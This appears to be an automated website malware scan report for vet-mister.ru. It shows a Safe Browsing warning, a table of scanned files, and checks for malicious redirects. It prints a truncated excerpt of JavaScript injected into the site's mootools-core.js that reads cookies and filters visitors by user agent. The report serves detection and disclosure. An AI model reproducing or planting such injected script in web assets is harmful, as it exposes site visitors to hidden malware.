Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vet-mister.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://vet-mister.ru/ | 200 OK Content-Length: 39755 Content-Type: text/html | clean |
http://vet-mister.ru//plugins/system/js_loadjquery/libraries/jquery/jquery-1.6.4.min.js/ | 404 Not Found Content-Length: 1107 Content-Type: text/html | clean |
http://vet-mister.ru/test404page.js | 404 Not Found Content-Length: 1107 Content-Type: text/html | clean |
http://vet-mister.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97412 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t=void 0== return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})(); Antivirus reports:
| ||
http://vet-mister.ru/media/system/js/core.js | 200 OK Content-Length: 5834 Content-Type: application/x-javascript | clean |
http://vet-mister.ru/media/system/js/caption.js | 200 OK Content-Length: 1779 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://vet-mister.ru/plugins/system/jqueryeasy/jquerynoconflict.js | 200 OK Content-Length: 1070 Content-Type: application/x-javascript | clean |
http://vet-mister.ru/modules/mod_yjis4/src/mod_yjis4.min.js | 200 OK Content-Length: 20348 Content-Type: application/x-javascript | clean |
http://vet-mister.ru/templates/vetlechenie/js/script.js | 200 OK Content-Length: 1065 Content-Type: application/x-javascript | clean |
http://vet-mister.ru/templates/vetlechenie/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 10847 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vet-mister.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 18:21:32 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 542daf6aa8dc2499c38a881360d5a5ec=kvm04nm80muh0a04qvpeco8u83; path=/
X-Powered-By: PHP/5.2.17-pl0-gentoo
GET / HTTP/1.1
Host: vet-mister.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 18:21:32 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 542daf6aa8dc2499c38a881360d5a5ec=kvm04nm80muh0a04qvpeco8u83; path=/
X-Powered-By: PHP/5.2.17-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: vet-mister.ru
Referer: http://www.google.com/search?q=vet-mister.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vet-mister.ru
Referer: http://www.google.com/search?q=vet-mister.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.